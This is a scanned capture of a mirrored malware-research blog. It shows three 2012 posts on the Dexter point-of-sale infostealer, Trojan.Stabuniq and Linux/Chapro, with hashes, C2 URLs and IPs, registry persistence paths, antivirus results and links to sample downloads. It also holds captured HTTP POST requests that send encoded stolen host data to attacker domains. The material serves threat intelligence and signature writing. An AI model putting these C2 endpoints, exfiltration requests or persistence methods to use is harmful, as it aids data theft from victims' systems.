contagio13.rssing.com
Open in
urlscan Pro
185.150.190.192
Public Scan
Submitted URL: http://contagio13.rssing.com/chan-24521930/all_p1.html
Effective URL: https://contagio13.rssing.com/chan-24521930/all_p1.html
Submission: On September 12 via manual from US — Scanned from DE
Effective URL: https://contagio13.rssing.com/chan-24521930/all_p1.html
Submission: On September 12 via manual from US — Scanned from DE
Form analysis 5 forms found in the DOM
Name: hmsearch — GET
<form name="hmsearch" method="get">
<input type="text" name="q" id="cs-header-menu-search-form-input" placeholder="Type and press enter..." value="" onkeydown="return dogsearch_if13(document.hmsearch.q.value, document.hmsearch.stype.value, event.keyCode);">
<input type="text" name="dummy" style="visibility:hidden">
<select name="stype" style="visibility:hidden">
<option selected="" value="rssing.com">RSSing.com</option>
</select>
</form>Name: searchbox_1 — GET
<form name="searchbox_1" method="get">
<div class="input-group wrapped-text-input">
<input type="text" name="q" placeholder="search RSSing.com...." value="" onkeydown="return dogsearch_if13(document.searchbox_1.q.value, document.searchbox_1.stype.value,event.keyCode);">
<div class="input-group-prepend">
<a class="cs-btn cs-btn-medium " href="javascript:;" onclick="dogsearch(document.searchbox_1.q.value, document.searchbox_1.stype.value);">Search</a>
</div>
</div>
<input type="text" name="dummy" style="display:none">
<select name="stype" style="display:none">
<option selected="" value="rssing.com">RSSing.com</option>
</select>
</form>Name: searchbox_2 — GET
<form name="searchbox_2" method="get">
<div class="input-group wrapped-text-input">
<input type="text" name="q" placeholder="search RSSing.com...." value="" onkeydown="return dogsearch_if13(document.searchbox_2.q.value, document.searchbox_2.stype.value,event.keyCode);">
<div class="input-group-prepend">
<a class="cs-btn cs-btn-medium " href="javascript:;" onclick="dogsearch(document.searchbox_2.q.value, document.searchbox_2.stype.value);">Search</a>
</div>
</div>
<input type="text" name="dummy" style="display:none">
<select name="stype" style="display:none">
<option selected="" value="rssing.com">RSSing.com</option>
</select>
</form>Name: searchbox_3 — GET
<form name="searchbox_3" method="get">
<div class="input-group wrapped-text-input">
<input type="text" name="q" placeholder="search RSSing.com...." value="" onkeydown="return dogsearch_if13(document.searchbox_3.q.value, document.searchbox_3.stype.value,event.keyCode);">
<div class="input-group-prepend">
<a class="cs-btn cs-btn-medium " href="javascript:;" onclick="dogsearch(document.searchbox_3.q.value, document.searchbox_3.stype.value);">Search</a>
</div>
</div>
<input type="text" name="dummy" style="display:none">
<select name="stype" style="display:none">
<option selected="" value="rssing.com">RSSing.com</option>
</select>
</form>Name: searchbox_4 — GET
<form name="searchbox_4" method="get">
<div class="input-group wrapped-text-input">
<input type="text" name="q" placeholder="search RSSing.com...." value="" onkeydown="return dogsearch_if13(document.searchbox_4.q.value, document.searchbox_4.stype.value,event.keyCode);">
<div class="input-group-prepend">
<a class="cs-btn cs-btn-medium " href="javascript:;" onclick="dogsearch(document.searchbox_4.q.value, document.searchbox_4.stype.value);">Search</a>
</div>
</div>
<input type="text" name="dummy" style="display:none">
<select name="stype" style="display:none">
<option selected="" value="rssing.com">RSSing.com</option>
</select>
</form>Text Content
WE VALUE YOUR PRIVACY
We and our partners store and/or access information on a device, such as cookies
and process personal data, such as unique identifiers and standard information
sent by a device for personalised ads and content, ad and content measurement,
and audience insights, as well as to develop and improve products. With your
permission we and our partners may use precise geolocation data and
identification through device scanning. You may click to consent to our and our
partners’ processing as described above. Alternatively you may click to refuse
to consent or access more detailed information and change your preferences
before consenting. Please note that some processing of your personal data may
not require your consent, but you have a right to object to such processing.
Your preferences will apply to this website only. You can change your
preferences at any time by returning to this site or visit our privacy policy.
MORE OPTIONSDISAGREEAGREE
* Login
* Account
* Sign Up
* Home
* About Us
* Catalog
* Search
* Register RSS
* Embed RSS
* FAQ
* Get Embed Code
* Example: Default CSS
* Example: Custom CSS
* Example: Custom CSS per Embedding
* Super RSS
* Usage
* View Latest
* Create
* Contact Us
* Technical Support
* Guest Posts/Articles
* Report Violations
* Google Warnings
* Article Removal Requests
* Channel Removal Requests
* General Questions
* DMCA Takedown Notice
* RSSing>>
* Collections:
* RSSing
* EDA
* Intel
* Mesothelioma
* SAP
* SEO
* Latest
* Articles
* Channels
* Super Channels
* Popular
* Articles
* Pages
* Channels
* Super Channels
* Top Rated
* Articles
* Pages
* Channels
* Super Channels
* Trending
* Articles
* Pages
* Channels
* Super Channels
Switch Editions? German Edition (Deutsch)
Cancel
AddThis Sharing Buttons
Share to FacebookFacebookShare to TwitterTwitterShare to PrintPrintShare to
EmailEmailShare to PinterestPinterestShare to GmailGmailShare to
LinkedInLinkedInShare to Email AppEmail AppShare to TumblrTumblrShare to
MoreAddThis
English
RSSing.com
RSSing>> Latest Popular Top Rated Trending
Channel: contagio
SUBSCRIBE Remove ADS
NSFW?
Claim
0
Mark channel Not-Safe-For-Work? cancel confirm NSFW Votes: (0 votes)
Are you the publisher? Claim or contact us about this channel.
No ratings yet.
Showing article 1 to 20 of 71 in channel 24521930
Channel Details:
* Title: contagio
* Channel Number: 24521930
* Language: eng
* Registered On: November 28, 2013, 12:57 pm
* Number of Articles: 71
* Latest Snapshot: July 9, 2022, 11:37 am
* RSS URL: http://contagiodump.blogspot.com/rss.xml
* Publisher: http://contagiodump.blogspot.com/
* Description: malware dump
* Catalog: //contagio13.rssing.com/catalog.php?indx=24521930
Viewing all 71 articles
Page 1 Page 2 Page 3 Last Page
Browse latest View live
DEC 2012 DEXTER - POS INFOSTEALER SAMPLES AND INFORMATION
December 22, 2012, 11:50 pm
Next Dec. 2012 Trojan.Stabuniq samples - financial infostealer trojan
0
0
Image may be NSFW.
Clik here to view.End of the year presents. Point of Sale (POS) infostealer, aka
Dexter.
I got 3 more "tester-type" samples and added them below - in addition to the
well known 4 samples mentioned by Seculert.
You can read more about it here:
Seculert Dexter - Draining blood out of Point of Sales
TrendMicro Infostealer Dexter Targets Checkout Systems
Verizon: Dexter: More of the same, or hidden links?
Volatility labs Unpacking Dexter POS "Memory Dump Parsing" Malware
Trustwave labs: The Dexter Malware: Getting Your Hands Dirty
Symantec Infostealer.Dexter
Files
The following are MD5s of Dexter related malware samples: (Seculert Dexter -
Draining blood out of Point of Sales )
2d48e927cdf97413523e315ed00c90ab
94c604e5cff7650f60049993405858dfc96f8ac5b77587523d37a8f8f3d9c1bc
70feec581cd97454a74a0d7c1d3183d1
cae3cdaaa1ec224843e1c3efb78505b2e0781d70502bedff5715dc0e9b561785
f84599376e35dbe1b33945b64e1ec6ab
b27aadd3ddca1af7db6f441c6401cf74b1561bc828e19f9104769ef2d158778e
ed783ccea631bde958ac64185ca6e6b6
fb46ea9617e0c8ead0e4358da6233f3706cfc6bbbeba86a87aaab28bb0b21241
Additional Files
65f5b1d0fcdaff431eec304a18fb1bd6
7e327be39260fe4bb8923af25a076cd3569df54e0328c7fe5cd7c6a2d3312674
560566573de9df114677881cf4090e79
28a26fe50e2d4e2b541ae083aa0236bd484c7eb3b30cf9b5a7f4d579e77bf438
1f03568616524188425f92afbea3c242
bdbe024a08c9a4e62c5692762aa03b4c1e564b38510cb4b4b1758e371637edb4
Download
Image may be NSFW.
Clik here to view.Download 7 samples listed above (email me if you need the
password)
General information
> Samples
> 2d48e927cdf97413523e315ed00c90ab (Seculert MD5)
> f84599376e35dbe1b33945b64e1ec6ab (Seculert MD5)
> ed783ccea631bde958ac64185ca6e6b6 (Seculert MD5)
> all contain http://193.107.17.126/test/gateway.phpfor C2 communications
> (Verizon: Dexter: More of the same, or hidden links? ):
U:\FirmWork\Studio\Common\Bin.exe in strings is found i
ed783ccea631bde958ac64185ca6e6b6 (Seculert MD5)
2d48e927cdf97413523e315ed00c90ab (Seculert MD5)
f84599376e35dbe1b33945b64e1ec6ab (Seculert MD5)
560566573de9df114677881cf4090e79
1f03568616524188425f92afbea3c242
65f5b1d0fcdaff431eec304a18fb1bd6
@@PAUH in strings found in all 9 files
Individual file information
1
70feec581cd97454a74a0d7c1d3183d1 (Seculert MD5)
=====================================================================
cae3cdaaa1ec224843e1c3efb78505b2e0781d70502bedff5715dc0e9b561785
70feec581cd97454a74a0d7c1d3183d1 (Seculert MD5)
%userprofile%\Application Data\fubqq\fubqq.exe
injected in iexplore.exe
Image may be NSFW.
Clik here to view.
or e,g, POST http://fabcaa97871555b68aa095335975e613.com:80/portal1/gateway.php
or any of the domains below (Verizon: Dexter: More of the same, or hidden
links? ):
11e2540739d7fbea1ab8f9aa7a107648.com
7186343a80c6fa32811804d23765cda4.com
e7dce8e4671f8f03a040d08bb08ec07a.com
e7bc2d0fceee1bdfd691a80c783173b4.com
815ad1c058df1b7ba9c0998e2aa8a7b4.com
67b3dba8bc6778101892eb77249db32e.com
fabcaa97871555b68aa095335975e613.com
| <- | | ->
| | Total |
| Frames Bytes | | Frames Bytes
| | Frames Bytes |
173.255.196.136 <-> 172.16.253.130 150 37230 120
7200 270 44430
172.16.253.255 <-> 172.16.253.1 107 35324 0
0 107 35324
> ASCI strings
> GetSystemWindowsDirectoryW
> KERNEL32.dll
> C:\Debugger.fgh
> ,vr1
> ---snip----
> ModuleReplace.exe
> LoadMemberData
> ?RenameCommand@@YG_JPAUIRootStorage@@PAUHUMPD__@@@Z
> ?RenameFortation@@YG_JPAUIRootStorage@@PAUHUMPD__@@@Z
> ?RenameHerbal@@YG_JPAUIRootStorage@@PAUHUMPD__@@@Z
> ?RenameLoadMac@@YG_JPAUIRootStorage@@PAUHUMPD__@@@Z
> ?RenameOptimize@@YG_JPAUIRootStorage@@PAUHUMPD__@@@Z
> ?RenameTest@@YG_JPAUIRootStorage@@PAUHUMPD__@@@Z
> VS_VERSION_INFO
> StringFileInfo
> 040904B0
> CompanyName
> Microsoft Corporation
> FileDescription
> Microsoft Help and Support
> FileVersion
> 6.1.7600.16385 (win7_rtm.090713-1255)
> InternalName
> HelpPane.exe
> LegalCopyright
> Microsoft Corporation. All rights reserved.
> OriginalFilename
> HelpPane.exe
> ProductName
> Microsoft
> Windows
> Operating System
> ProductVersion
> 6.1.7600.16385
2
2D48E927CDF97413523E315ED00C90AB (Seculert MD5)
=====================================================================
94c604e5cff7650f60049993405858dfc96f8ac5b77587523d37a8f8f3d9c1bc
%userprofile%\Application Data\pmnnw\pmnnw.exe
http://193.107.17.126:80/test/gateway.php
| Frames Bytes | | Frames Bytes | | Frames
Bytes |
172.16.253.255 <-> 172.16.253.1 1003 335116 0
0 1003 335116
193.107.17.126 <-> 172.16.253.130 264 16368 88
5280 352 21648
> ASCI Strings
> T7M
> #nR
> U:\FirmWork\Studio\Common\Bin.exe
> AssistCoop.exe
> ?FancyBack@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?OptimusIO@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?OptionWindowGear@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
pcap and traffic same as above.
3
ED783CCEA631BDE958AC64185CA6E6B6 (Seculert MD5)
========================================================================
fb46ea9617e0c8ead0e4358da6233f3706cfc6bbbeba86a87aaab28bb0b21241
%userprofile%\Application Data\jikmr\jikmr.exe
http://193.107.17.126:80/test/gateway.php
172.16.253.255 <-> 172.16.253.1 108 35676 0
0 108 35676
193.107.17.126 <-> 172.16.253.129 30 1860 9
540 39 2400
pbk
}64
> ASCI Strings
> U:\FirmWork\Studio\Common\Bin.exe
> Vljdsevr
> ----snip-----
> SHLWAPI.dll
> TeamReg.exe
> ?FancyBack@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?ForsakenQuantum@@YGKPAUHKEY__@@PAUHPALETTE__@@@Z
> ?OptimusIO@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?OptionWindowGear@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
4
F84599376E35DBE1B33945B64E1EC6AB (Seculert MD5)
========================================================================
b27aadd3ddca1af7db6f441c6401cf74b1561bc828e19f9104769ef2d158778e
%userprofile%\Application Data\yebcs\yebcs.exe
http://193.107.17.126:80/test/gateway.php
ASCI strings
> TkJ
> U:\FirmWork\Studio\Common\Bin.exe
> Kagtklnuhjchep
> Trebuchet MS
> ------snip------------
> GetQueueStatus
> USER32.dll
> TeamReg.exe
> ?FancyBack@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?ForsakenQuantum@@YGKPAUHKEY__@@PAUHPALETTE__@@@Z
> ?OptimusIO@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
Additional samples
5
1F03568616524188425F92AFBEA3C242
========================================================================
bdbe024a08c9a4e62c5692762aa03b4c1e564b38510cb4b4b1758e371637edb4
1F03568616524188425F92AFBEA3C242
%userprofile%\Application Data\pstwx\pstwx.exe
\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN %userprofile%\Application
Data\pstwx\pstwx.exe
Injected in iexplore.exe
Process ID: 2756 (iexplore.exe)
Process doesn't appear to be a service
PIDPortLocal IPState Remote IP:Port
2756TCP 1130 172.16.253.129 SYN SENT193.107.17.126:80
http://193.107.17.126:80/test/gateway.php
Conversations | Frames Bytes | |
Frames Bytes | | Frames Bytes |
172.16.253.255 <-> 172.16.253.1 13 3016 0
0 13 3016
193.107.17.126 <-> 172.16.253.129 3 186 1
60 4 246
WHOIS Source: RIPE NCC
IP Address: 193.107.17.126
Country: Seychelles
Network Name: IDEALSOLUTION
Owner Name: Ideal Solution Ltd
From IP: 193.107.16.0
To IP: 193.107.19.255
Allocated: Yes
Contact Name: Ideal Solution NOC
Address: Sound & Vision House, Francis Rachel Str., Victoria, Mahe,
Seychelles
Email: ideal.solutions.org@gmail.com
However, real location is in Russia
http://bgp.he.net/AS58001#_whois
http://bgp.he.net/AS58001#_peers
role: Ideal Solution NOCaddress: Sound & Vision House, Francis Rachel Str.
address: Victoria, Mahe, Seychelles remarks:
***************************************
remarks: This is Ideal-Solution and 2x4.ru IP network remarks
Image may be NSFW.
Clik here to view.
6
65F5B1D0FCDAFF431EEC304A18FB1BD6
======================================================================
7e327be39260fe4bb8923af25a076cd3569df54e0328c7fe5cd7c6a2d3312674
65F5B1D0FCDAFF431EEC304A18FB1BD6
%userprofile%\Application Data\kwqpn\kwqpn.exe
http://193.107.17.126:80/test/gateway.php
| Frames Bytes | | Frames Bytes
| | Frames Bytes |
172.16.253.255 <-> 172.16.253.1 30 9000 0
0 30 9000
193.107.17.126 <-> 172.16.253.131 9 558 2
120 11 678
pcap and traffic same as above.
ASCI Strings
RSDSB
> U:\FirmWork\Studio\Common\Bin.exe
> AssistCoop.exe
> ?FancyBack@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?OptimusIO@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?OptionWindowGear@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?RegardSeven@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?RightApocoloptus@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
7
560566573de9df114677881cf4090e79
======================================================================
28a26fe50e2d4e2b541ae083aa0236bd484c7eb3b30cf9b5a7f4d579e77bf438
Application Data\aewtm\aewtm.exe
URL
http://193.107.17.126:80/test/gateway.php
ASCI Strings
> RSDS
> U:\FirmWork\Studio\Common\Bin.exe
> AssistCoop.exe
> ?FancyBack@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?OptimusIO@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?OptionWindowGear@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
> ?RegardSeven@@YGGPAUHKEY__@@PAUHPALETTE__@@@Z
Search
RSSing.com
--------------------------------------------------------------------------------
DEC. 2012 TROJAN.STABUNIQ SAMPLES - FINANCIAL INFOSTEALER TROJAN
December 23, 2012, 10:17 pm
Next Dec 2012 Linux.Chapro - trojan Apache iframer
Previous Dec 2012 Dexter - POS Infostealer samples and information
0
0
Image may be NSFW.
Clik here to view.
Holiday presents.
Research: Symantec. Trojan.Stabuniq Found on Financial Institution Servers
More research: Stabuniq in-Depth by Emanuele De Lucia
Here is a another minor news maker of 2012.
It is very well detected by most AV but if you want to play or make IDS or yara
signatures, the pcap and the sample is below.
File
File: stabuniq_F31B797831B36A4877AA0FD173A7A4A2
Size: 79360
MD5: F31B797831B36A4877AA0FD173A7A4A2
Download
Image may be NSFW.
Clik here to view.Download Email me if you need the password
Download pcap for F31B797831B36A4877AA0FD173A7A4A2
File information
F31B797831B36A4877AA0FD173A7A4A2
========================================================================
5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb
Created files:
C:\Program Files\7-Zip\Uninstall\smagent.exe << copy of
itself F31B797831B36A4877AA0FD173A7A4A2
Injected in iexplore.exe
Process ID: 1536 (iexplore.exe)
1536 TCP 1130 172.16.253.129 SYN SENT 205.234.252.212:80
At this point domains maybe sinkholed
Download pcap for F31B797831B36A4877AA0FD173A7A4A2
POST /rssnews.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: benhomelandefit.com
Content-Length: 1093
Cache-Control: no-cache
id=NzQxKDYoNig3&varname=SmdzdGc=&comp=QkNKSl5S&ver=UW9oYmlxdSZeVg==&src=NTREb3I=&sec=0&view=dWtnYWNocihjfmMmKyY5DHFrb3Z0cHVjKGN+YyYrJjkMcnRnaHVqZ3JpdChjfmMmKyY5DGVrYihjfmMmKyY5DGpnaGF2Z2VtKGN+YyYrJjkMSmdoYVN2YmdyY3QoY35jJismOQxla2IoY35jJismOQxla2IoY35jJismOQxSVkdzcmlFaWhoY2VyKGN+YyYrJjkMcXVlaHJgfyhjfmMmKyY5DGdqYShjfmMmKyY5DFJWR3NyaUVpaGhVcGUoY35jJismOQxwa3JpaWp1YihjfmMmKyY5DHFiYGthdChjfmMmKyY5DGtiayhjfmMmKyY5DGx3dShjfmMmKyY5DGNtdGgoY35jJismOQx1cGVuaXVyKGN+YyYrJjkMR2V0f2pvZVVjdHBvZWMoY35jJismOQxlcmBraWgoY35jJismOQxwa3JpaWp1YihjfmMmKyY5DHRzaGJqajU0KGN+YyYrJjkMdXZpaWp1cChjfmMmKyY5DGN+dmppdGN0KGN+YyYrJjkMdXBlbml1cihjfmMmKyY5DHVwZW5pdXIoY35jJismOQx1cGVuaXVyKGN+YyYrJjkMdXBlbml1cihjfmMmKyY5DHVwZW5pdXIoY35jJismOQxwa2dlcm5qdihjfmMmKyY5DGp1Z3V1KGN+YyYrJjkMdWN0cG9lY3UoY35jJismOQxxb2hqaWFpaChjfmMmKyY5DGV1dHV1KGN+YyYrJjkMdWt1dShjfmMmKyY5DFV/dXJjayYrJjkMXVV/dXJjayZWdGllY3V1WyYrJjkM&dat=&page=RTxaVnRpYXRnayZAb2pjdVoxK1xvdlpTaG9odXJnampadWtnYWNocihjfmM=&val=cnB5b3dub3BjZnRyZ2ZweWlyaXllYmdmZnhibHh4YWp5anN5b2x3YmxkeGRpcG9k&up=rpyownopcftrgfpy&xid=ZTU0N2BlPzMrZzc+NisyNWRiK2cyMzUrMDI1ZzNkNDBnNmA1
POST /rssnews.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: sovereutilizeignty.com
Content-Length: 1093
Cache-Control: no-cache
id=NzQxKDYoNig3&varname=SmdzdGc=&comp=QkNKSl5S&ver=UW9oYmlxdSZeVg==&src=NTREb3I=&sec=0&view=dWtnYWNocihjfmMmKyY5DHFrb3Z0cHVjKGN+YyYrJjkMcnRnaHVqZ3JpdChjfmMmKyY5DGVrYihjfmMmKyY5DGpnaGF2Z2VtKGN+YyYrJjkMSmdoYVN2YmdyY3QoY35jJismOQxla2IoY35jJismOQxla2IoY35jJismOQxSVkdzcmlFaWhoY2VyKGN+YyYrJjkMcXVlaHJgfyhjfmMmKyY5DGdqYShjfmMmKyY5DFJWR3NyaUVpaGhVcGUoY35jJismOQxwa3JpaWp1YihjfmMmKyY5DHFiYGthdChjfmMmKyY5DGtiayhjfmMmKyY5DGx3dShjfmMmKyY5DGNtdGgoY35jJismOQx1cGVuaXVyKGN+YyYrJjkMR2V0f2pvZVVjdHBvZWMoY35jJismOQxlcmBraWgoY35jJismOQxwa3JpaWp1YihjfmMmKyY5DHRzaGJqajU0KGN+YyYrJjkMdXZpaWp1cChjfmMmKyY5DGN+dmppdGN0KGN+YyYrJjkMdXBlbml1cihjfmMmKyY5DHVwZW5pdXIoY35jJismOQx1cGVuaXVyKGN+YyYrJjkMdXBlbml1cihjfmMmKyY5DHVwZW5pdXIoY35jJismOQxwa2dlcm5qdihjfmMmKyY5DGp1Z3V1KGN+YyYrJjkMdWN0cG9lY3UoY35jJismOQxxb2hqaWFpaChjfmMmKyY5DGV1dHV1KGN+YyYrJjkMdWt1dShjfmMmKyY5DFV/dXJjayYrJjkMXVV/dXJjayZWdGllY3V1WyYrJjkM&dat=&page=RTxaVnRpYXRnayZAb2pjdVoxK1xvdlpTaG9odXJnampadWtnYWNocihjfmM=&val=cnB5b3dub3BjZnRyZ2ZweWlyaXllYmdmZnhibHh4YWp5anN5b2x3YmxkeGRpcG9k&up=rpyownopcftrgfpy&xid=ZTU0N2BlPzMrZzc+NisyNWRiK2cyMzUrMDI1ZzNkNDBnNmA1
$2jX
The following information is from
Symantec: http://www.symantec.com/security_response/writeup.jsp?docid=2012-121809-2437-99&tabid=2
> When the Trojan is executed, it may create the following files:
> %ProgramFiles%\[FOLDER NAME ONE]\[FOLDER NAME TWO]\acroiehelper.exe
> %ProgramFiles%\[FOLDER NAME ONE]\[FOLDER NAME TWO]\groovemonitor.exe
> %ProgramFiles%\[FOLDER NAME ONE]\[FOLDER NAME TWO]\issch.exe
> %ProgramFiles%\[FOLDER NAME ONE]\[FOLDER NAME TWO]\jqs.exe
> %ProgramFiles%\[FOLDER NAME ONE]\[FOLDER NAME TWO]\smagent.exe
> The variable [FOLDER NAME ONE] may be one of the following:
> AcroIEHelper Module
> GrooveMonitor Utility
> InstallShield Update Service Scheduler
> Java Quick Starter
> SoundMAX service agent
> The variable [FOLDER NAME TWO] may be one of the following:
> Bin
> Helper
> Installer
> Uninstall
> Update
> Next, the Trojan creates the following registry entries so that it runs every
> time Windows starts:
> HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"[RANDOM
> GUID]" = "[FILE NAME]"
> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"[RANDOM
> GUID]" = "[FILE NAME]"
> HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\"[RANDOM
> GUID]" = "[FILE NAME]"
> The Trojan then creates the following registry entry:
> HKEY_CURRENT_USER\Software\Stability Software\"Uniq" = "[RANDOM GUID]"
> Next, the Trojan may collect the following information from the compromised
> computer:
> Architecture type
> Computer name
> File name of the threat
> IP address
> Operating system version
> Operating system service pack version, if installed
> Running processes
> The Trojan may then send the stolen information to the following remote
> locations:
> anatwriteromist.com
> bbcnews192.com
> belsaw920.com
> benhomelandefit.com
> midfielderguin.com
> prominentpirsa.com
> sovereutilizeignty.com
> yolanda911.com
Automatic scans
https://www.virustotal.com/file/5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb/analysis/
SHA256: 5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb
SHA1: 17db1bbaa1bf1b920e47b28c3050cbff83ab16de
MD5: f31b797831b36a4877aa0fd173a7a4a2
File size: 77.5 KB ( 79360 bytes )
File name: vti-rescan
File type: Win32 EXE
Tags: peexe armadillo
Detection ratio: 28 / 45
Analysis date: 2012-12-21 13:48:23 UTC ( 2 days, 16 hours ago )
AhnLab-V3 Backdoor/Win32.Ruskill 20121221
AntiVir TR/Graftor.27095.3 20121221
Avast Win32:Ruskill-FQ [Trj] 20121221
AVG Dropper.Generic6.CAIC 20121221
BitDefender Gen:Variant.Graftor.27095 20121221
DrWeb Trojan.Packed.22607 20121221
Emsisoft Gen:Variant.Graftor.27095 (B) 20121221
ESET-NOD32 a variant of Win32/Injector.RVT 20121221
F-Secure Gen:Variant.Graftor.27095 20121221
Fortinet W32/Injector.RVT!tr 20121221
GData Gen:Variant.Graftor.27095 20121221
Ikarus Worm.Win32.Dorkbot 20121221
Kaspersky HEUR:Trojan.Win32.Generic 20121221
Malwarebytes Backdoor.Bot.wpm 20121221
McAfee Generic.dx!bg3a 20121221
Microsoft Trojan:Win32/Buniq.A 20121221
MicroWorld-eScan Gen:Variant.Graftor.27095 20121221
NANO-Antivirus Trojan.Win32.Graftor.ymdbi 20121221
Norman W32/Suspicious_Gen4.BCNST 20121221
Panda Generic Malware 20121221
PCTools Trojan.Stabuniq 20121221
Sophos Mal/FakeAV-QN 20121221
SUPERAntiSpyware - 20121220
Symantec Trojan.Stabuniq 20121221
TheHacker Trojan/Injector.rvt 20121220
TrendMicro TROJ_STABUNIQ.A 20121221
TrendMicro-HouseCall TROJ_STABUNIQ.A 20121221
VIPRE Trojan.Win32.Generic!BT 20121221
DEC 2012 LINUX.CHAPRO - TROJAN APACHE IFRAMER
December 23, 2012, 10:56 pm
Next * * * Merry Christmas and Happy New Year! * * *
Previous Dec. 2012 Trojan.Stabuniq samples - financial infostealer trojan
0
0
Image may be NSFW.
Clik here to view.Here is another notable development of 2012 - Linux malware
(see Wirenet trojan posted earlier too)
Research: ESET Malicious Apache module used for content injection:
Linux/Chapro.A
All the samples are below. I did not test it thus no pcaps this time.
------Linux/Chapro.A e022de72cce8129bd5ac8a0675996318
------Injected iframe 111e3e0bf96b6ebda0aeffdb444bcf8d
------Java exploit 2bd88b0f267e5aa5ec00d1452a63d9dc
------Zeus binary 3840a6506d9d5c2443687d1cf07e25d0
Download
Image may be NSFW.
Clik here to view.
Download. (Email me if you need the password scheme - see profile for email)
------Linux/Chapro.A e022de72cce8129bd5ac8a0675996318
------Java exploit 2bd88b0f267e5aa5ec00d1452a63d9dc
------Zeus binary 3840a6506d9d5c2443687d1cf07e25d0
Automatic scans
Analysis ESET Malicious Apache module used for content injection:
https://www.virustotal.com/file/345a86f839372db0ee7367be0b9df2d2d844cef406407695a2f869d6b3380ece/analysis/
SHA256:345a86f839372db0ee7367be0b9df2d2d844cef406407695a2f869d6b3380ece
SHA1:2ccb789d57d3ce3dd929307eb78878e6e5c61ccf
MD5:e022de72cce8129bd5ac8a0675996318
File size:38.3 KB ( 39176 bytes )
File name:e022de72cce8129bd5ac8a0675996318
File type:ELF
Tags:elf
Detection ratio:19 / 46
Analysis date: 2012-12-21 19:12:13 UTC ( 2 days, 11 hours ago )
AVGGeneric6_c.CLGW20121221
BitDefenderBackdoor.Linux.Agent.E20121221
CAT-QuickHeal-20121220
Commtouch-20121221
ComodoUnclassifiedMalware20121221
DrWebLinux.Iframe.120121221
ESET-NOD32Linux/Chapro.A20121221
F-SecureBackdoor.Linux.Agent.E20121221
GDataBackdoor.Linux.Agent.E20121221
IkarusBackdoor.Linux.Apmod20121221
JiangminBackdoor/Linux.fs20121221
K7AntiVirusTrojan20121221
KasperskyHEUR:Backdoor.Linux.Apmod.gen20121221
MicroWorld-eScanBackdoor.Linux.Agent.E20121221
nProtectBackdoor.Linux.Agent.E20121221
PCToolsMalware.Linux-Chapro20121221
SophosTroj/Apmod-D20121221
SUPERAntiSpyware-20121221
SymantecLinux.Chapro20121221
TrendMicroELF_CHAPRO.A20121221
TrendMicro-HouseCallELF_CHAPRO.A20121221
ViRobotLinux.A.Apmod.3917620121221
Exploit:Java/CVE-2012-1723
https://www.virustotal.com/file/a70a8891829344ad3db818b3c4ad76e38a78b0ce3c43d7aaf65752fe56d10e09/analysis/
SHA256:a70a8891829344ad3db818b3c4ad76e38a78b0ce3c43d7aaf65752fe56d10e09
SHA1:d01f76f5467c86bfa266c429e1315e7aad821f93
MD5:2bd88b0f267e5aa5ec00d1452a63d9dc
File size:30.2 KB ( 30957 bytes )
File name:nYCND
File type:ZIP
Tags:exploit zip cve-2012-1723
Detection ratio:2 / 43
Analysis date: 2012-11-23 09:54:46 UTC ( 1 month ago )
KasperskyUDS:DangerousObject.Multi.Generic20121123
MicrosoftExploit:Java/CVE-2012-1723!generic20121123
https://www.virustotal.com/file/12f38f9be4df1909a1370d77588b74c60b25f65a098a08cf81389c97d3352f82/analysis/
SHA256:12f38f9be4df1909a1370d77588b74c60b25f65a098a08cf81389c97d3352f82
SHA1:5050b57e01bb2aa9730f826f36ad4d41477d8bd9
MD5:3840a6506d9d5c2443687d1cf07e25d0
File size:222.0 KB ( 227328 bytes )
File name:3840a6506d9d5c2443687d1cf07e25d0
File type:Win32 EXE
Tags:peexe
Detection ratio:32 / 44
Analysis date: 2012-12-22 20:02:23 UTC ( 1 day, 10 hours ago )
AgnitumTrojan.Injector!5xrrtg7IXGQ20121222
AntiVirTR/PSW.Zbot.288420121222
AvastWin32:Crypt-OMW [Trj]20121222
AVGPSW.Generic10.AOEA20121222
BitDefenderTrojan.Generic.821892520121222
ComodoTrojWare.Win32.Trojan.Agent.Gen20121222
DrWebTrojan.PWS.Panda.36820121222
ESET-NOD32a variant of Win32/Injector.ZRA20121222
F-SecureTrojan.Generic.821892520121222
FortinetW32/Zbot.ARO!tr20121222
GDataTrojan.Generic.821892520121222
IkarusTrojan.Win32.Yakes20121222
JiangminTrojanSpy.Zbot.csit20121221
K7AntiVirusSpyware20121221
KasperskyTrojan-Spy.Win32.Zbot.gmeq20121222
KingsoftWin32.Troj.Zbot.gm.(kcloud)20121217
MalwarebytesTrojan.Agent20121222
McAfeePWS-Zbot.gen.aro20121222
McAfee-GW-EditionPWS-Zbot.gen.aro20121222
MicrosoftPWS:Win32/Zbot20121222
NormanW32/ZBot.DIJG20121222
nProtectTrojan.Generic.821892520121222
PandaTrj/Genetic.gen20121222
PCToolsTrojan-PSW.Generic!rem20121222
SophosMal/Zbot-JM20121222
SUPERAntiSpywareTrojan.Agent/Gen-Zbot20121222
SymantecInfostealer20121222
